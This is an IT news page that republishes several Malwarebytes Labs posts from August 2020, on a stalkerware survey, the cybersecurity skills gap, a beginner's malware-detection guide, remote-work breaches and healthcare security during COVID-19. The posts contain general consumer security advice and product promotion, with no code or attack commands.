IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Good news: Stalkerware survey results show majority of people aren’t creepy

Back in July, we sent out a survey to Malwarebytes Labs readers on the subject of stalkerware—the term used to describe apps that can potentially invade someone’s privacy. We asked one question: “Have you ever used an app to monitor your partner’s phone?” 

The results were reassuring.

We received 4,578 responses from readers all over the world to our stalkerware survey and the answer was a resounding “NO.” An overwhelming 98.23 percent of respondents said they had not used an app to monitor their partner’s phone.

Chart Q1 200820

For our part, Malwarebytes takes stalkerware seriously. We’ve been detecting apps with monitoring capabilities for more than six years—now Malwarebytes for WindowsMac, or Android detects and allows users to block applications that attempt to monitor your online behavior and/or physical whereabouts without your knowledge or consent. Last year, we helped co-found the Coalition Against Stalkerware with the Electronic Frontier Foundation, the National Network to End Domestic Violence, and several other AV vendors and advocacy groups.

It stands to reason that a readership comprised of Malwarebytes customers and people with a strong interest in cybersecurity would say “no” to stalkerware—we’ve spoken up about the potential privacy concerns associated with using these apps and the danger of equipping software with high-grade surveillance capabilities for a long time. We didn’t want to assume everyone agreed with us, but the data from our stalkerware survey shows our instincts were right.

No to stalkerware

Beyond a simple yes or no, we also asked our survey-takers to explain why they answered the way they did. The most common answer by far was a mutual respect and trust for their partner. In fact, “respect,” “trust,” and “privacy” were the three most commonly-used words by our participants in their responses:

“My partner and I share our lives … To monitor someone else’s phone is a tragic lack of trust.”

Many of those surveyed cited the Golden Rule (treat others the way you want to be treated) as their reason for not using stalkerware-type apps:

“I wouldn’t want anyone to monitor me so I therefore I would not monitor them.”

Others saw it as a clear-cut issue of ethics:

“People are entitled to their privacy as long as they do not do things that are illegal. Their rights end at the beginning of mine.”

Some respondents shared harrowing real-life accounts of being a victim of stalkerware or otherwise having their privacy violated:

“I have been a victim of stalking several times when vicious criminals used my own surveillance cameras to spy on my activity then used it to break into my apartment.”

Stalkerware vs. location sharing vs. parental monitoring

Many of those surveyed, answering either yes or no, made a distinction between stalkerware-type apps writ large and location-sharing apps like Apple’s Find My Phone and Google Maps. Location sharing was generally considered acceptable because users volunteered to share their own information and sharing was limited to their current location.

“My wife & myself allow Apple Find My Phone to track each other if required. I was keen that should I not arrive home from a run, she could find out where I was in the case of a health issue or accident.”

Also considered okay by our respondents were the types of parental controls packaged in by default with their various devices. Many respondents specifically mentioned tracking their child’s location:

“It would not be ok with me if someone was monitoring me and I would never do it to anyone else, the only thing I would like is be able to track my child if kidnapped.”

Some parents admitted to using monitoring of some kind with their children, but it wasn’t clear how far they were willing to go and if children were aware they were being monitored:

“The only reason I have set up parental control for my son is for his safety most importantly.”

This is the murky world of parental-monitoring apps. On one end of the spectrum there are the first-party parental controls like those built into the iPhone and Nintendo Switch. These controls allow parents to restrict screen time and approve games and additional content on an ad hoc basis. Then there are third-party apps, which provide limited capabilities to track one thing and one thing only, like, say, a child’s location, or their screen time, or the websites they are visiting.

On the other end of the spectrum, there are apps in the same parental monitoring category that can provide a far broader breadth of monitoring, from tracking all of a child’s interactions on social media to using a keylogger that might even reveal online searches meant to stay private. 

You can hear more about our take on these apps in our latest podcast episode, but the long and the short of it is that Malwarebytes doesn’t recommend them, as they can feature much of the same high-tech surveillance capabilities of nation-state malware and stalkerware, but often lack basic cybersecurity and privacy measures.

Who said ‘yes’ to stalkerware?

Of course, our stalkerware survey analysis would not be complete without taking a look at the 81 responses from those who said “yes” to using apps to monitor their partners’ phone.

Again, the majority of respondents made a distinction between consensual location-sharing apps and the more intrusive types of monitoring that stalkerware can provide. Many of those who answered “yes” to using an app to monitor their partner’s phone said things like:

“My wife and I have both enabled Google’s location sharing service. It can be useful if we need to know where each other is.”

And:

“Only the Find My iPhone app. My wife is out running or hiking by herself quite often and she knows I want to know if she is safe.”

Of the 81 people who said they use apps to monitor their partners’ phones, only nine cited issues of trust, cheating, “being lied to” or “change in partner’s behavior.” Of those nine, two said their partner agreed to install the app.

NortonLifeLock’s online creeping study

The results of the Labs stalkerware survey are especially interesting when compared to the Online Creeping Survey conducted by NortonLifeLock, another founding member of the Coalition Against Stalkerware.

This survey of more than 2,000 adults in the United States found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

Twenty-nine percent of those surveyed admitted to checking a current or former partner’s phone. Twenty-one percent admitted to looking through a partner’s search history on one of their devices without permission. Nine percent admitted to creating a fake social media profile to check in on their partners.

When compared to the Labs stalkerware survey, it would seem that online stalking is considered more acceptable when couched under the term “checking in.” For perspective, if one were to swap the word “diary” for “phone,” we don’t think too many people would feel comfortable admitting, “Hey, I’m just ‘checking in’ on my girlfriend/wife’s diary. No big deal.”

Stalkerware in a pandemic

Finally, we can’t end this piece without at least acknowledging the strange and scary times we’re living in. Shelter-in-place orders at the start of the coronavirus pandemic became de facto jail sentences for stalkerware and domestic violence victims, imprisoning them with their abusers. No surprise, The New York Times reported an increase in the number of domestic violence victims seeking help since March.

For some users, however, the pandemic has brought on a different kind of suffering. One survey respondent best summed up the current malaise of anxiety, fear, and depression: 

“No partner to monitor lol.”

We like to think, dear reader, that they’re not laughing at themselves and the challenges of finding a partner during COVID. Rather, they’re laughing at all of us.

Stalkerware resources

As mentioned earlier, Malwarebytes for WindowsMac, or Android will detect and let users remove stalkerware-type applications. And if you think you might have stalkerware on your mobile device, be sure to check out our article on what to do when you find stalkerware or suspect you’re the victim of stalkerware.

Here are a few other important reads on stalkerware:

Stalkerware and online stalking are accepted by Americans. Why?

Stalkerware’s legal enforcement problem

Awareness of stalkerware, monitoring apps, and spyware on the rise

How to protect against stalkerware

The post Good news: Stalkerware survey results show majority of people aren’t creepy appeared first on Malwarebytes Labs.

The cybersecurity skills gap is misunderstood

Nearly every year, a trade association, a university, an independent researcher, or a large corporation—and sometimes all of them and many in between—push out the latest research on the cybersecurity skills gap, the now-decade-plus-old idea that the global economy lacks a growing number of cybersecurity professionals who cannot be found.

It is, as one report said, a “state of emergency.” It would be nice, then, if the numbers made more sense.

In 2010, according to one study focused on the United States, the cybersecurity skills gap included at least 10,000 individuals. In 2015, according to a separate analysis, that number was 209,000. Also, in 2015, according to yet another report, that number was more than 1 million. Today, that number is both a projected 3.5 million by 2021 and a current 4.07 million, worldwide.

PK Agarwal, dean of the University of California Santa Cruz Silicon Valley Extension, has followed these numbers for years. He followed the data in personal interest, and he followed it more deeply when building programs at Northeastern University Silicon Valley, the educational hub opened by the private Boston-based university, where he most recently served as regional dean and CEO. During his research, he uncovered something.

“In terms of actual numbers, if you’re looking at the supply and demand gap in cybersecurity, you’ll see tons of reports,” Agarwal said. “They’ll be all over the map.”

He continued: “Yes, there is a shortage, but it is not a systemic shortage. It is in certain sweet spots. That’s the reality. That’s the actual truth.”

Like Agarwal said, there are “sweet spots” of truth to the cybersecurity skills gap—there can be difficulties in finding immediate need on deadline-driven projects, or in finding professionals trained in a crucial software tool that a company cannot spend time training current employees on.

But more broadly, the cybersecurity skills gap, according to recruiters, hiring managers, and academics, is misunderstood. Rather than a lack of talent, there is sometimes, on behalf of companies, a lack of understanding in how to find and hire that talent.

By posting overly restrictive job requirements, demanding contradictory skillsets, refusing to hire remote workers, offering non-competitive rates, and failing to see minorities, women, and veterans as viable candidates, businesses could miss out on the very real, very accessible cybersecurity talent out there.

In other words, if you are not able to find a cybersecurity expert for your company, that doesn’t mean they don’t exist. It means you might need help in finding them.

Number games

In 2010, the Center for Strategic & International Studies (CSIS) released its report “A Human Capital Crisis in Cybersecurity.” According to the paper, “the cyber threat to the United States affects all aspects of society, business, and government, but there is neither a broad cadre of cyber experts nor an established cyber career field to build upon, particularly within the Federal government.”

Further, according to Jim Gosler, a then-visiting NSA scientist and the founding director of the CIA’s Clandestine Information Technology Office, only 1,000 security experts were available in the US with the “specialized skills to operate effectively in cyberspace.” The country, Gosler said in interviews, needed 10,000 to 30,000.

Though the cybersecurity skills gap was likely spotted before 2010, the CSIS paper partly captures a theory that draws supports today—the skills gap is a lack of talent.

Years later, the cybersecurity skills gap reportedly grew into a chasm. It would soon span the world.  

In 2016, the Enterprise Strategy Group called the cybersecurity skills gap a “state of emergency,” unveiling research that showed that 46 percent of senior IT and cybersecurity professionals at midmarket and enterprise companies described their departments’ lack of cybersecurity skills as “problematic.” The same year, separate data compiled by the professional IT association ISACA predicted that the entire world would be short 2 million cyber security professionals by the year 2019.

But by 2019, that prediction had already come true, according to a survey published that year by the International Information System Security Certification Consortium, or (ISC)2. The world, the group said, employed 2.8 million cybersecurity professionals, but it needed 4.07 million.

At the same time, a recent study projected that the skills gap in 2021 would be lower than the (ISC)2 estimate for today—instead predicting a need of 3.5 million professionals by next year. Throughout the years, separate studies have offered similarly conflicting numbers.

The variation can be dizzying, but it can be explained by a variation in motivations, said Agarwal. He said these reports do not exist in a vacuum, but are rather drawn up for companies and, perhaps unsurprisingly, for major universities, which rely on this data to help create new programs and to develop curriculum to attract current and prospective students.

It’s a path Agarwal went down years ago when developing a Master’s program in computer science at Northeastern University Silicon Valley extension. The data, he said, supported the program, showing some 14,000 Bay Area jobs that listed a Master’s degree as a requirement, while neighboring Bay Area schools were only on track to produce fewer than 500 Master’s graduates that year.

“There was a massive gap, so we launched the campus,” Agarwal said. The program garnered interest, but not as much as the data suggested.

Agarwal remembered thinking at the time: “What the hell is going on?” 

It turns out, a lot was going on, Agarwal said. For many students, the prospect of more student debt for a potentially higher pay was not enough to get them into the program. Further, the salaries for Bachelor’s graduates and Master’s graduates were close enough that students had a difficult time seeing the value in getting the advanced degree.

That weariness towards a Master’s degree in computer science also plagues cybersecurity education today, Agarwal said, comparing it to an advanced degree in Biology.

“Cybersecurity at the Master’s level is about the same as in Biology—it has no market value,” Agarwal said. “If you have a BA [in Biology], you’re a lab rat. If you have an MA, you’re a senior lab rat.”

So, imagine the confusion for cybersecurity candidates who, when applying for jobs, find Master’s degrees listed as requirements. And yet, that is far from uncommon. The requirement, like many others, can drive candidates away.

Searching different

For companies that feel like the cybersecurity talent they need simply does not exist, recruiters and strategists have different advice: Look for cybersecurity talent in a different way. That means more lenient degree and certification requirements, more openness to working remotely, and hiring for the aptitude of a candidate, rather than going down a must-have wish list.

Jim Johnson, senior vice president and Chief Technology Officer for the international recruiting agency Robert Half, said that, when he thinks about client needs in cybersecurity, he often recalls a conference panel he watched years ago. A panel of hiring experts, Johnson said, was asked a simple question: How do you find people?

One person, Johnson recalled, said “You need to be okay hiring people who know nothing.”

The lesson, Johnson said, was that companies should hire for aptitude and the ability to learn.

“You hire the personality that fits what you’re looking for,” Johnson said. “If they don’t have everything technically, but they’re a shoo-in for being able to learn it, that’s the person you bring up.”

Johnson also explained that, for some candidates, restrictive job requirements can actually scare them away. Johnson’s advice for companies is that they understand what they’re looking for, but they don’t make the requirements for the job itself so restrictive that it causes hesitation for some potential candidates.

“You might miss a great hire because you required three certifications and they had one, or they’re in the process of getting one,” Johnson said.

Similarly, Thomas Kranz, longtime cybersecurity consultant and current cybersecurity strategy adviser for organizations, called job requirements that specifically call for degrees as “the biggest barrier companies face when trying to hire cybersecurity talent.”

“This is an attitude that belongs firmly in the last century,” Kranz wrote. ‘Must have a [Bachelor of Science] or advanced degree’ goes hand in hand with ‘Why can’t we find the candidates we need?’”

This thinking has caught on beyond the world of recruiters.

In February, more than a dozen companies, including Malwarebytes, pledged to adopt the Aspen Institute’s “Principles for Growing and Sustaining the Nation’s Cybersecurity Workforce.”

The very first principle requires companies to “widen the aperture of candidate pipelines, including expanding recruitment focus beyond applicants with four-year degrees or using non-gender biased job descriptions.”

At Malwarebytes, the practice of removing strict degree requirements from cybersecurity job descriptions has been in place for cybersecurity hires for at least a year and a half.

“I will never list a BA or BS as a hard requirement for most positions,” said Malwarebytes Chief Information Security Officer John Donovan. “Work and life experience help to round out candidates, especially for cyber-security roles.” Donovan added that, for more junior positions, there are “creative ways to broaden the applicant pool,” such as using the recruiting programs YearUp, NPower, and others.

The two organizations, like many others, help transition individuals to tech-focused careers, offering training classes, internships, and access to a corporate world that was perhaps beyond reach.

These types of career development groups can also help a company looking to broaden its search to include typically overlooked communities, including minorities, women, disabled people, and veterans.

Take, for example, the International Consortium of Minority Cybersecurity Professionals, which creates opportunities for women and minorities to advance in the field, or the nonprofit Women in CyberSecurity (WiCyS), which recently developed a veterans’ program. WiCyS primarily works to cultivate the careers of women in cybersecurity by offering training sessions, providing mentorship, granting scholarships, and working with interested corporate partners.

“In cybersecurity, there are challenges that have never existed before,” said Lynn Dohm, executive director for WiCyS. “We need multitasking, diversity of thought, and people from all different backgrounds, all genders, and all ethnicities to tackle these challenges from all different perspectives.”

Finally, for companies still having trouble finding cybersecurity talent, Robert Half’s Johnson recommended broadening the search—literally. Cybersecurity jobs no longer need to be filled by someone located within a 40-mile radius, he said, and if anything, the current pandemic has reinforced this idea.

“The affect of the pandemic, which has shifted how people do their jobs, has made us now realize that the whole working remote thing isn’t as scary as we thought,” Johnson said.

But companies should understand that remote work is as much a boon to them as it is to potential candidates. No longer are qualified candidates limited in their search by what they can physically get to—now, they can apply for jobs that may seem more appealing that are much farther from where they live.

And that, of course, will have an impact on salary, Johnson said.

“While Bay Area salaries or a New York salary, while those might not change dramatically, what is changing is the folks that might be being recruited in Des Moines or in Omaha or Oklahoma City, who have traditionally been limited [regionally], now they’re being recruited by companies on the coast,” Johnson said.

“That’s affecting local companies, which are paying those $80,000 salaries. Now those candidates are being offered $85,000 to work remotely. Now I’ve got to compete with that.”

Planning ahead

The cybersecurity skills gap need not frighten a company or a senior cybersecurity manager looking to hire. There are many actionable steps that a business can take today to help broaden their search and find the talent that perhaps other companies are ignoring.

First, stop including hard degree requirements in job descriptions. The same goes for cybersecurity certifications. Second, start accepting the idea of remote work for these teams. The value of “butts in seats” means next to nothing right now, so get used to it. Third, understand that remote work means potentially better pay for the candidates you’re trying to hire, so look at the market data and pay appropriately. Fourth, connect with a recruiting organization, like WiCyS, if you want some extra help in creating a diverse and representative team. Fifth, also considering looking inwards, as your next cybersecurity hire might actually be a cybersecurity promotion.

And the last piece of advice, at least according to Robert Half’s Johnson? Hire a recruiter.

The post The cybersecurity skills gap is misunderstood appeared first on Malwarebytes Labs.

A week in security (August 17 – 23)

Last week on Malwarebytes Labs, we looked at the impact of COVID-19 on healthcare cybersecurity, dug into some pandemic stats in terms of how workforces coped with going remote, and served up a crash course on malware detection. Our most recent Lock and Code podcast explored the safety of parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (August 17 – 23) appeared first on Malwarebytes Labs.

‘Just tell me how to fix my computer:’ a crash course on malware detection

Malware. You’ve heard the term before, and you know it’s bad for your computer—like a computer virus. Which begs the question: Do the terms “malware” and “computer virus” mean the same thing? How do you know if your computer is infected with malware? Is “malware detection” just a fancy phrase for antivirus? For that matter, are anti-malware and antivirus programs the same? And let’s not forget about Apple and Android users, who are probably wondering if they need cybersecurity software at all.

This is the point where your head explodes.

All you want to do is get your work done, Zoom your friends/family, Instacart a bottle of wine, and stream a movie till you go to bed. But it’s during these everyday tasks that we let our guard down and are most susceptible to malware, which includes such cyberthreats as ransomware, Trojans, spyware, stalkerware, and, yes, viruses.

To add insult to injury, cybercriminals deliver malware using sneaky social engineering tricks, such as fooling people into opening email attachments that infect their computers or asking them to update their personal ~~~information on malicious websites pretending to be legitimate. Sounds awful, right? It sure is!

The good news is that staying safe online is actually fairly easy. All it takes is a little common sense, a basic understanding of how threats work, and a security program that can detect and protect against malware. Think of it like street smarts but for the Internet. With these three elements, you can safely avoid the majority of the dangers online today.

So, for the Luddites and the technologically challenged among our readership, this is your crash course on malware detection. In this article, we’ll answer all the questions you wish you didn’t have to ask like:

  • What is malware?
  • How can I detect malware?
  • Is Windows Defender good enough?
  • Do Mac and mobile devices need anti-malware?
  • How do you remove malware?
  • How do you prevent malware infections?

What is malware?

Malware, or “malicious software,” is a catchall term that refers to any malicious program that is harmful to your devices. Targets for malware can include your laptop, tablet, mobile phone, and WiFi router. Even household items like smart TVs, smart fridges, and newer cars with lots of onboard technology can be vulnerable. Put it this way: If it connects to the Internet, there’s a chance it could be infected with malware.

There are many types of malware, but here’s a gloss on the more infamous and/or popular examples in rotation today.

Adware

Adware, or advertising-supported software, is software that displays unwanted advertising on your computer or mobile device. As stated in the Malwarebytes Labs 2020 State of Malware Report, adware is the most common threat to Windows, Mac, and Android devices today.

While it may not be considered as dangerous as some other forms of malware, such as ransomware, adware has become increasingly aggressive and malicious over the last couple years, redirecting users from their online searches to advertising-supported results, adding unnecessary toolbars to browsers, peppering screens with hard-to-close pop-up ads, and making it difficult for users to uninstall.

Computer virus

A computer virus is a form of malware that attaches to another program (such as a document), which can then replicate and spread on its own after an initial execution on a system involving human interaction. But computer viruses aren’t as prevalent as they once were. Cybercriminals today tend to focus their efforts on more lucrative threats like ransomware.

Trojan

A Trojan is a program that hides its true intentions, often appearing legitimate but actually conducting malicious business. There are many families of malware that can be considered Trojans, from information-stealers to banking Trojans that siphon off account credentials and money.

Once active on a system, a Trojan can quietly steal your personal info, spam other potential victims from your account, or even load other forms of malware. One of the more effective Trojans on the market today is called Emotet, which has evolved from a basic info-stealer to a tool for spreading other forms of malware to other systems—especially within business networks.

Ransomware

Ransomware is a type of malware that locks you out of your device and/or encrypts your files, then forces you to pay a ransom to get them back. Many high-profile attacks against businesses, schools, and local government agencies over the last four years have included ransomware of some kind. Some of the more notorious recent strains of ransomware include Ryuk, Sodinokibi, and WastedLocker.

How can I detect malware?

There are a few ways to spot malware on your device. It may be running slower than usual. You may have loads of ads bombarding your screen. Your files may be frozen or your battery life may drain faster than usual. Or there may be no sign of infection at all.

That’s why good malware detection starts with a good anti-malware program. For our purposes, “good” anti-malware is going to be a program that can detect and protect against any of the threats we’ve covered above and then some, including what’s known as zero-day or zero-hour exploits. These are new threats developed by cybercriminals to exploit vulnerabilities, or weaknesses in code, that have not yet been detected or fixed by the company that created them. (That’s why when companies do fix these vulnerabilities, they issue patches, or updates, and notify users immediately.)

Antivirus and other legacy cybersecurity software rely on something called signature-based detection in order to stop threats. Signature-based detection works by comparing every file on your computer against a list of known malware. Each threat carries a signature that functions much like a set of fingerprints. If your security program finds code on your computer that matches the signature of a known threat, it’ll isolate and remove the malicious program.

While signature-based detection can be effective for protecting against known threats, it is time-consuming and resource-intensive for your computer. To continue our fingerprint analogy, signature-based detection can only spot threats with an established rap sheet. Brand-new malware, zero-day, and zero-hour exploits are free to spread and cause damage until security researchers identify the threat and reverse-engineer it, adding its signature to an increasingly bloated database.

This is where heuristic analysis comes in. Heuristic analysis relies on investigating a program’s behavior to determine whether a bit of computer code is malicious or not. In other words, if a program is acting like malware, it probably is malware. After demonstrating suspicious behavior, files are quarantined and can be manually or automatically removed—without having to add signatures to the database.

The best anti-malware programs, then, can protect against new and emerging zero-day/zero-hour threats using heuristic analysis, as well as threats we already know about using traditional signature-based detection. If your antivirus or anti-malware relies on signature-based malware detection alone to keep your system safe—you’re not really safe.

Is Windows Defender good enough?

Maybe you’re using Windows Defender because your computer came with it preinstalled. It seems fine, but you’ve never looked at other options. Or maybe you have Windows Defender and your computer somehow got an infection anyways. Either way, here’s something to consider: Defender is one of the most targeted security programs by cybercriminals. And there are whole categories of threats that Windows Defender doesn’t protect against.

The majority of threats detected today are found using signature-less technologies, but there are several other methods of malware detection that, when layered together, offer optimal protection over Windows Defender. Malwarebytes Premium, for example, uses a layered approach to threat detection that includes heuristic analysis technology as just one of its components. Other major components include ransomware protection and rollback, web protection, and anti-exploit technology.

Do Mac and mobile devices need anti-malware?

In 2019 for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint. Over the last few years, Mac adware has exploded, debunking the myth that Macs are safe from cyberthreats. While Macs’ built-in AV blocks some malware, Mac adware has become so aggressive that it warrants extra anti-malware protection.

Meanwhile, Mac’s mobile counterpart, the iPhone, does not allow outside anti-malware programs to be downloaded. (Apple says its own built-in iOS protection is enough.) However, there are some privacy apps, web browser protection, and scam call blockers users can try for added safety.

As for Android, malware attacks from threats, such as adware, monitoring apps, and other potentially unwanted programs (PUPs) are more common. At best, PUPs serve up annoying ads you can’t get rid. At worst, they’ll discretely steal information from your phone.

Also, because the Android environment allows for third-party downloads, it’s a bit more vulnerable to malware and PUPs than the iPhone. So we recommend a good anti-malware solution for your Android device as well.

How can I remove malware?

Malware detection is the important first step for any cybersecurity solution. But what happens next? If you get a malware infection on one of your devices, the good news is you can easily remove it. The process of identifying and removing cyberthreats from your computer systems is called “remediation.”

To conduct a thorough remediation of your device, download an anti-malware program and run a scan. Before doing so, make sure you back up your files. Afterwards, change all of your account passwords in case they were compromised in the malware attack. And if you’re dealing with a tough infection, you’re in luck: Malwarebytes has a rock-solid reputation for removing malware that other programs can’t even detect let alone remove.

If you need to clean an infected computer now, download Malwarebytes for free, review these tips for remediation, and run a scan to see which threats are hiding on your devices.

How do I protect against malware?

Yes, it’s possible to clean up an infected computer and fully remove malware from your system. But the damage from some forms of malware, like ransomware, cannot be undone. If it’s encrypted your files and you haven’t backed them up, the jig is up. So your best defense is to beat the bad guys at their own game—by preventing infection in the first place.

There are a few ways to do this. Keeping all devices updated with the latest software patches will block threats designed to exploit older vulnerabilities. Automating backups of files to an encrypted cloud storage platform won’t protect against ransomware attacks, but it will ensure that you needn’t pay the ransom to retrieve your files. Training on cybersecurity best practices, including how to spot a phishing attack, tech support scam, or other social engineering technique, also helps stave off insider threats.

However, the best way to prevent malware infection is to use an antivirus/anti-malware program with layered protection that stops a wide range of cyberthreats in real time—whether it’s a malicious website or a brand-new malware family never before seen “in the wild.”

But if you have antivirus already and threats are getting through, maybe it’s time to move on to a program that’ll “just fix your computer” so you can stop worrying about malware detection and start…participating in distance learning classes? Ordering groceries? Having your virtual doctor’s appointment? Developing a vaccine? Literally anything else.

The post ‘Just tell me how to fix my computer:’ a crash course on malware detection appeared first on Malwarebytes Labs.

20 percent of organizations experienced breach due to remote worker, Labs report reveals

It is no surprise that moving to a fully remote work environment due to COVID-19 would cause a number of changes in organizations’ approaches to cybersecurity. What has been surprising, however, are some of the unanticipated shifts in employee habits and how they have impacted the security posture of businesses large and small.

Our latest Malwarebytes Labs report, Enduring from Home: COVID-19’s Impact on Business Security, reveals some unexpected data about security concerns with today’s remote workforce.

Our report combines Malwarebytes product telemetry with survey results from 200 IT and cybersecurity decision makers from small businesses to large enterprises, unearthing new security concerns that surfaced after the pandemic forced US businesses to send their workers home.

The data showed that since organizations moved to a work from home (WFH) model, the potential for cyberattacks and breaches has increased. While this isn’t entirely unexpected, the magnitude of this increase is surprising. Since the start of the pandemic, 20 percent of respondents said they faced a security breaches as a result of a remote worker. This in turn has increased costs, with 24 percent of respondents saying they paid unexpected expenses to address a cybersecurity breach or malware attack following shelter-in-place orders.

We noticed a stark increase in the use of personal devices for work: 28 percent of respondents admitted they’re using personal devices for work-related activities more than their work-issued devices. Beyond that, we found that 61 percent of respondents’ organizations did not urge employees to use antivirus solutions on their personal devices, further compounding the increase in attack surface with a lack of adequate protection.

We found a startling contrast between the IT leaders’ confidence in their security during the transition to work from home (WFH) environments, and their actual security postures, demonstrating a continued problem of security hubris. Roughly three quarters (73.2 percent) of our survey respondents gave their organizations a score of 7 or above on preparedness for the transition to WFH, yet 45 percent of respondents’ organizations did not perform security and online privacy analyses of necessary software tools for WFH collaboration.

Additional report takeaways

  • 18 percent of respondents admitted that, for their employees, cybersecurity was not a priority, while 5 percent said their employees were a security risk and oblivious to security best practices.
  • At the same time, 44 percent of respondents’ organizations did not provide cybersecurity training that focused on potential threats of working from home (like ensuring home networks had strong passwords, or devices were not left within reach of non-authorized users).
  • While 61 percent of respondents’ organizations provided work-issued devices to employees as needed, 65 percent did not deploy a new antivirus (AV) solution for those same devices.

To learn more about the increasing risks uncovered in today’s remote workforce population, read our full report:

Enduring from Home: COVID-19’s Impact on Business Security

The post 20 percent of organizations experienced breach due to remote worker, Labs report reveals appeared first on Malwarebytes Labs.

The impact of COVID-19 on healthcare cybersecurity

As if stress levels in the healthcare industry weren’t high enough due to the COVID-19 pandemic, risks to its already fragile cybersecurity infrastructure are at an all-time high. From increased cyberattacks to exacerbated vulnerabilities to costly human errors, if healthcare cybersecurity wasn’t circling the drain before, COVID-19 sent it into a tailspin.

No time to shop for a better solution

As a consequence of being too occupied with fighting off the virus, some healthcare organizations have found themselves unable to shop for different security solutions better suited for their current situation.

For example, the Public Health England (PHE) agency, which is responsible for managing the COVID-19 outbreak in England, decided to prolong their existing contract with their main IT provider without allowing competitors to put in an offer. They did this to ensure their main task, monitoring the widespread disease, could go forward without having to worry about service interruptions or other concerns.

Extending a contract without looking at competitors is not only a recipe for getting a bad deal, but it also means organizations are unable to improve on the flaws they may have found in existing systems and software.

Attacks targeting healthcare organizations

Even though there were some early promises of removing healthcare providers as targets after COVID-19 struck, cybercriminals just couldn’t be bothered to do the right thing for once. In fact, we have seen some malware attacks specifically target healthcare organizations since the start of the pandemic.

Hospitals and other healthcare organizations have shifted their focus and resources to their primary role. While this is completely understandable, it has placed them in a vulnerable situation. Throughout the COVID-19 pandemic, an increasing amount of health data is being controlled and stored by the government and healthcare organizations. Reportedly this has driven a rise in targeted, sophisticated cyberattacks designed to take advantage of an increasingly connected environment.

In healthcare, it’s also led to a rise in nation-state attacks, in an effort to steal valuable COVID-19 data and disrupt care operations. In fact, the sector has become both a target and a method of social engineering advanced attacks. Malicious actors taking advantage of the pandemic have already launched a series of phishing campaigns using COVID-19 as a lure to drop malware or ransomware.

COVID-19 has not only placed healthcare organizations in direct danger of cyberattacks, but some have become victims of collateral damage. There are, for example, COVID-19-themed business email compromise (BEC) attacks that might be aiming for exceptionally rich targets. However, some will settle for less if it is an easy target—like one that might be preoccupied with fighting a global pandemic.

Ransomware attacks

As mentioned before, hospitals and other healthcare organizations run the risk of falling victim to “spray and prey” attack methods used by some cybercriminals. Ransomware is only one of the possible consequences, but arguably the most disruptive when it comes to healthcare operations—especially those in charge of caring for seriously ill patients.

INTERPOL has issued a warning to organizations at the forefront of the global response to the COVID-19 outbreak about ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments. INTERPOL’s Cybercrime Threat Response team detected a significant increase in the number of attempted ransomware attacks against key organizations and infrastructure engaged in the virus response.

Special COVID-19 facilities

During the pandemic, many countries constructed or refurbished special buildings to house COVID-19 patients. These were created to quickly increase capacity while keeping the COVID patients separate from others. But these ad-hoc COVID-19 medical centers now have a unique set of vulnerabilities: They are remote, they sit outside of a defense-in-depth architecture, and the very nature of their existence means security will be a lower priority. Not only are these facilities prone to be understaffed in IT departments, but the biggest possible chunk of their budget is deployed to help the patients.

Another point of interest is the transfer of patient data from within the regular hospital setting to these temporary locations. It is clear that the staff working in COVID facilities will need the information about their patients, but how safely is that information being stored and transferred? Is it as protected in the new environment as the old one?

Data theft and protection

A few months ago, when the pandemic proved to be hard to beat, many agencies reported about targeted efforts by cybercriminals to lift coronavirus research, patient data, and more from the healthcare, pharmaceutical, and research industries. Among these agencies were the National Security Agency, the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Agency, and the UK National Cyber Security.

In the spring, many countries started discussing the use of contact tracing and/or tracking apps in an effort to help keep the pandemic under control. Apps that would warn users if they had been in the proximity of an infected user. Understandably, many privacy concerns were raised by advocates and journalists.

There is so much data being gathered and shared with the intention of fighting COVID-19, but there’s also the need to protect individuals’ personal information. So, several US senators introduced the COVID-19 Consumer Data Protection Act. The legislation would provide all Americans with more transparency, choice, and control over the collection and use of their personal health, device, geolocation, and proximity data. The bill will also hold businesses accountable to consumers if they use personal data to fight the COVID-19 pandemic.

The impact

Even though such a protection act might be welcome and needed, the consequences for an already stressed healthcare cybersecurity industry might be too overwhelming. One could argue that data protection legislation should not be passed on a case by case basis, but should be in place to protect citizens at all times, not just when extra measures are needed to fight a pandemic.

In the meantime, we at Malwarebytes will do our part to support those in the healthcare industry by keeping malware off their machines—that’s one less virus to worry about.

Stay safe everyone!

The post The impact of COVID-19 on healthcare cybersecurity appeared first on Malwarebytes Labs.

Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Emory Roane, policy counsel at Privacy Rights Clearinghouse, about parental monitoring apps.

These tools offer parents the capabilities to spot where their children go, read what their kids read, and prevent them from, for instance, visiting websites deemed inappropriate. And, for the likely majority of parents using these tools, their motives are sympathetic—being online can be a legitimately confusing and dangerous experience.

But where parental monitoring apps begin to cause concern is just how powerful they are.

Tune in to hear about the capabilities of parental monitoring apps, how parents can choose to safely use these with their children, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

  • Intel experienced a leak due to “intel123″—the weak password that secured its server. (Source: Computer Business Review)
  • Fresh Zoom vulnerabilities for its Linux client were demonstrated at DEFCON 2020. (Source: The Hacker News)
  • Researchers saw an increase in scam attacks against users of Netflix, YouTube, HBO, and Twitch. (Source: The Independent)
  • TikTok was found collecting MAC addresses from mobile devices, a tactic that may have violated Google’s policies. (Source: The Wall Street Journal)
  • Several ads of apps labelled “stalkerware” can still be found in Google Play’s search results after the search giant’s advertising ban already took effect (Source: TechCrunch)

Stay safe, everyone!

The post Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane appeared first on Malwarebytes Labs.

Explosive technology and 3D printers: a history of deadly devices

Hackers: They’ll turn your computer into a BOMB!

“Hackers turning computers into bombs” is a now legendary headline, taken from the Weekly World News. It has rather set the bar for “people will murder you with computers” anxiety. Even those familiar with the headline may not have dug into the story too much on account of how silly it sounds, but it’s absolutely well worth checking out if only for the bit about “assassins” and “dangerous sociopaths.”

